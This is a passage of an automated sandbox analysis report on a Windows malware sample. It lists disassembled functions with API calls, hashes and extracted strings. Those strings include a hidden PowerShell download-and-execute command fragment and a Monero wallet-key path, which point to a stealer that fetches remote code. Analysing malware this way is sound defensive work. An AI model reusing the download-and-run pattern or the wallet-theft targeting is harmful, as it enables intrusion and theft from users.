                          • Part of subcall function 00E3A9B0: lstrlen.KERNEL32(?,01968BB0,?,\Monero\wallet.keys,00E40E17), ref: 00E3A9C5
                          • Part of subcall function 00E3A9B0: lstrcpy.KERNEL32(00000000), ref: 00E3AA04
                          • Part of subcall function 00E3A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00E3AA12
                          • Part of subcall function 00E3A920: lstrcpy.KERNEL32(00000000,?), ref: 00E3A972
                          • Part of subcall function 00E3A920: lstrcat.KERNEL32(00000000), ref: 00E3A982
                          • Part of subcall function 00E3A8A0: lstrcpy.KERNEL32(?,00E40E17), ref: 00E3A905
                        • ShellExecuteEx.SHELL32(0000003C), ref: 00E32D85
                        Strings
                        • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00E32CC4
                        • ')", xrefs: 00E32CB3
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00E32D04
                        • <, xrefs: 00E32D39
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        • Associated: 00000000.00000002.2189001666.0000000000E20000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000ED1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000EDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.000000000106A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001200000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.00000000012E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000130A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001321000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189483225.0000000001322000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190212416.00000000014C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190249231.00000000014C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                        • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        • API String ID: 3031569214-898575020
                        • Opcode ID: 8c20a4695ad25336ce33a9d1abd920b7a125ee4fc6e08fdeac13da92698c76a7
                        • Instruction ID: 8871e5282b2ab02c849c9a39d43c308af80ef1c999840edbce7db5087c6321dc
                        • Opcode Fuzzy Hash: 8c20a4695ad25336ce33a9d1abd920b7a125ee4fc6e08fdeac13da92698c76a7
                        • Instruction Fuzzy Hash: FC41DE71D10208AADB18FFA0D89ABDDBFB4AF10300F445169F146B7191DF746A8ACF92
                        Function 00E29E10 Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 170memoryCOMMON
                        Download Yara Rule
                        APIs
                        • LocalAlloc.KERNEL32(00000040,?), ref: 00E29F41
                          • Part of subcall function 00E3A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00E3A7E6
                          • Part of subcall function 00E3A740: lstrcpy.KERNEL32(00E40E17,00000000), ref: 00E3A788
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        • Associated: 00000000.00000002.2189001666.0000000000E20000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000ED1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000EDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.000000000106A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001200000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.00000000012E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000130A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001321000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189483225.0000000001322000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190212416.00000000014C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190249231.00000000014C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$AllocLocal
                        • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                        • API String ID: 4171519190-1096346117
                        • Opcode ID: 22de2b65b562fd33a5d66e4fdeb94635331bcf9c5d79d0b2752fcc95cb145b42
                        • Instruction ID: 4ab934f6fbb7e25b2836c9f48650c0484bf8929bb69afe53d687ae24ad55558a
                        • Opcode Fuzzy Hash: 22de2b65b562fd33a5d66e4fdeb94635331bcf9c5d79d0b2752fcc95cb145b42
                        • Instruction Fuzzy Hash: 80615F71A00218EBDB24EFA4DC9AFED77B5AF44300F049128F90A7B191EB746A45CB52
                        Function 00E340B0 Relevance: 7.6, APIs: 5, Instructions: 124registrystringCOMMON
                        Download Yara Rule
                        APIs
                        • RegOpenKeyExA.ADVAPI32(80000001,0196E658,00000000,00020119,?), ref: 00E340F4
                        • RegQueryValueExA.ADVAPI32(?,0196F0C0,00000000,00000000,00000000,000000FF), ref: 00E34118
                        • RegCloseKey.ADVAPI32(?), ref: 00E34122
                        • lstrcat.KERNEL32(?,00000000), ref: 00E34147
                        • lstrcat.KERNEL32(?,0196F0D8), ref: 00E3415B
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        • Associated: 00000000.00000002.2189001666.0000000000E20000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000ED1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000EDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.000000000106A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001200000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.00000000012E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000130A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001321000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189483225.0000000001322000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190212416.00000000014C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190249231.00000000014C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$CloseOpenQueryValue
                        • String ID:
                        • API String ID: 690832082-0
                        • Opcode ID: a1d96028fba5fea6241a306fde185453b71b7fdee3c65cac888fb9a530c91f8f
                        • Instruction ID: a14148e1bd8dea5374f4d59bb0c7f9acccefbd01e6a5040093d82941fec9465f
                        • Opcode Fuzzy Hash: a1d96028fba5fea6241a306fde185453b71b7fdee3c65cac888fb9a530c91f8f
                        • Instruction Fuzzy Hash: F3418AB6D00108ABDB24FBA0EC46FEE777DBB98300F004598F65567185EA795B88CBD1
                        Function 00E36920 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON
                        Download Yara Rule
                        APIs
                        • GetSystemTime.KERNEL32(?), ref: 00E3696C
                        • sscanf.NTDLL ref: 00E36999
                        • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00E369B2
                        • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00E369C0
                        • ExitProcess.KERNEL32 ref: 00E369DA
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        • Associated: 00000000.00000002.2189001666.0000000000E20000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000ED1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000EDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.000000000106A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001200000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.00000000012E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000130A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001321000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189483225.0000000001322000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190212416.00000000014C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190249231.00000000014C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Time$System$File$ExitProcesssscanf
                        • String ID:
                        • API String ID: 2533653975-0
                        • Opcode ID: 35c2a3a9038a8bc383ce060c2e55f81e7f50135591dc9d15a88e5e54ec2d8fa0
                        • Instruction ID: df70c67201b526eb19af0326be6d27c0e94c61f62be9f94cae126a7dc6d8a62d
                        • Opcode Fuzzy Hash: 35c2a3a9038a8bc383ce060c2e55f81e7f50135591dc9d15a88e5e54ec2d8fa0
                        • Instruction Fuzzy Hash: F321EA75D00208AFCF08EFE4D949AEEBBB5BF48300F04852AE506B3254EB355605CBA5
                        Function 00E37E00 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00E37E37
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00E37E3E
                        • RegOpenKeyExA.ADVAPI32(80000002,0195BC20,00000000,00020119,?), ref: 00E37E5E
                        • RegQueryValueExA.ADVAPI32(?,0196E558,00000000,00000000,000000FF,000000FF), ref: 00E37E7F
                        • RegCloseKey.ADVAPI32(?), ref: 00E37E92
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        • Associated: 00000000.00000002.2189001666.0000000000E20000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000ED1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000EDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.000000000106A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001200000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.00000000012E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000130A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001321000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189483225.0000000001322000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190212416.00000000014C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190249231.00000000014C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                        • String ID:
                        • API String ID: 3225020163-0
                        • Opcode ID: d1f246254b89f753c6b859deea640213c7a2eebaef37dec73c07be85ea820ad4
                        • Instruction ID: 8e45ba2bd3653fd5c5afabf82713f268c7635ec9479c88c1090cb9ed17fe2973
                        • Opcode Fuzzy Hash: d1f246254b89f753c6b859deea640213c7a2eebaef37dec73c07be85ea820ad4
                        • Instruction Fuzzy Hash: 7E116AB1A44205EBDB20DF95DD4AFBBBBB8FB44B10F104119F646B7284D7796800CBA0
                        Function 00E39260 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON
                        Download Yara Rule
                        APIs
                        • StrStrA.SHLWAPI(0196F330,?,?,?,00E3140C,?,0196F330,00000000), ref: 00E3926C
                        • lstrcpyn.KERNEL32(0106AB88,0196F330,0196F330,?,00E3140C,?,0196F330), ref: 00E39290
                        • lstrlen.KERNEL32(?,?,00E3140C,?,0196F330), ref: 00E392A7
                        • wsprintfA.USER32 ref: 00E392C7
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        • Associated: 00000000.00000002.2189001666.0000000000E20000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000ED1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000EDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.000000000106A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001200000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.00000000012E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000130A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001321000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189483225.0000000001322000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190212416.00000000014C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190249231.00000000014C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpynlstrlenwsprintf
                        • String ID: %s%s
                        • API String ID: 1206339513-3252725368
                        • Opcode ID: a94c8ef42619917484576b0b1fc8adbf6cf1e42369219960086bc718a44a76e8
                        • Instruction ID: cbbb6d408d271528d248352faefe28084d27225d18411eeb5e683e80d2b25209
                        • Opcode Fuzzy Hash: a94c8ef42619917484576b0b1fc8adbf6cf1e42369219960086bc718a44a76e8
                        • Instruction Fuzzy Hash: 9301C075600108FFCB14EFDCD948DAE7BB9FB48354F109548F949A7205C6799A40DB90
                        Function 00E212A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00E212B4
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00E212BB
                        • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00E212D7
                        • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00E212F5
                        • RegCloseKey.ADVAPI32(?), ref: 00E212FF
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        • Associated: 00000000.00000002.2189001666.0000000000E20000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000ED1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000EDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.000000000106A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001200000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.00000000012E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000130A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001321000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189483225.0000000001322000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190212416.00000000014C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190249231.00000000014C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                        • String ID:
                        • API String ID: 3225020163-0
                        • Opcode ID: cbac67d9aa852096d690b07c98b431859737ef6824197ef63f877059ea350d44
                        • Instruction ID: 308837b697d75733d72a52bd6e10f2321f1cc3cfca48216837931cfafbbbbfc2
                        • Opcode Fuzzy Hash: cbac67d9aa852096d690b07c98b431859737ef6824197ef63f877059ea350d44
                        • Instruction Fuzzy Hash: 660112B5A40208FFDB10DFD0DC49FAEB7B8EB48701F008155FA45A7284D675AA018B50
                        Function 00E3C84E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        • Associated: 00000000.00000002.2189001666.0000000000E20000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000ED1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000EDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.000000000106A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001200000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.00000000012E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000130A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001321000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189483225.0000000001322000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190212416.00000000014C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190249231.00000000014C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: String___crt$Type
                        • String ID:
                        • API String ID: 2109742289-3916222277
                        • Opcode ID: 3c5e53f9110d9ce18d0c7c30f0bfa7466ccc4acabb91c46ac54e95d7abfae5cc
                        • Instruction ID: e8a7733ba12377507f23872b1a670f86bea2e56bd54806389126b04c73c1eb70
                        • Opcode Fuzzy Hash: 3c5e53f9110d9ce18d0c7c30f0bfa7466ccc4acabb91c46ac54e95d7abfae5cc
                        • Instruction Fuzzy Hash: 1041F6B110079C5EDB258B24CC89FFBBFF89B45708F2454E8E98AB6182D271DA45DF60
                        Function 00E36630 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON
                        Download Yara Rule
                        APIs
                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00E36663
                          • Part of subcall function 00E3A740: lstrcpy.KERNEL32(00E40E17,00000000), ref: 00E3A788
                          • Part of subcall function 00E3A9B0: lstrlen.KERNEL32(?,01968BB0,?,\Monero\wallet.keys,00E40E17), ref: 00E3A9C5
                          • Part of subcall function 00E3A9B0: lstrcpy.KERNEL32(00000000), ref: 00E3AA04
                          • Part of subcall function 00E3A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00E3AA12
                          • Part of subcall function 00E3A8A0: lstrcpy.KERNEL32(?,00E40E17), ref: 00E3A905
                        • ShellExecuteEx.SHELL32(0000003C), ref: 00E36726
                        • ExitProcess.KERNEL32 ref: 00E36755
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        • Associated: 00000000.00000002.2189001666.0000000000E20000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000ED1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000EDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.000000000106A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001200000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.00000000012E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000130A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001321000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189483225.0000000001322000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190212416.00000000014C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190249231.00000000014C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                        • String ID: <
                        • API String ID: 1148417306-4251816714
                        • Opcode ID: 8f7847563549c4ae1f87cdcb0f88d51f660eb7c32c6da02b70d574590fcba5ae
                        • Instruction ID: c9c10aae6714fc6eee5e9126d3a0075004d8d93133d3f8ba875ad725025b0197
                        • Opcode Fuzzy Hash: 8f7847563549c4ae1f87cdcb0f88d51f660eb7c32c6da02b70d574590fcba5ae
                        • Instruction Fuzzy Hash: 28316DB1900208AADB14EB50DC89BDD7BB8AF48300F405198F24A77191DF746B88CF65
                        Function 00E387C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00E40E28,00000000,?), ref: 00E3882F
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00E38836
                        • wsprintfA.USER32 ref: 00E38850
                          • Part of subcall function 00E3A740: lstrcpy.KERNEL32(00E40E17,00000000), ref: 00E3A788
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        • Associated: 00000000.00000002.2189001666.0000000000E20000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000ED1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000EDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.000000000106A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001200000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.00000000012E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000130A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001321000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189483225.0000000001322000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190212416.00000000014C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190249231.00000000014C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateProcesslstrcpywsprintf
                        • String ID: %dx%d
                        • API String ID: 1695172769-2206825331
                        • Opcode ID: 37fd30d7a228d72e94b9eeab0b9142fe20224c8fa31df802c1d3c77c47c180ad
                        • Instruction ID: a9655841e62cddd57c4736b0afe5ecb8c3dc3d4272fcbbc13261b5d32cdd5cf1
                        • Opcode Fuzzy Hash: 37fd30d7a228d72e94b9eeab0b9142fe20224c8fa31df802c1d3c77c47c180ad
                        • Instruction Fuzzy Hash: 1421FEB1A44204EFDB14EF94DD49FAEBBB8FB48711F104119F645B7284C77AA901CBA1
                        Function 00E38D50 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00E3951E,00000000), ref: 00E38D5B
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00E38D62
                        • wsprintfW.USER32 ref: 00E38D78
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        • Associated: 00000000.00000002.2189001666.0000000000E20000.00000004.00000001.01000000.00000003.sdmpDownload File
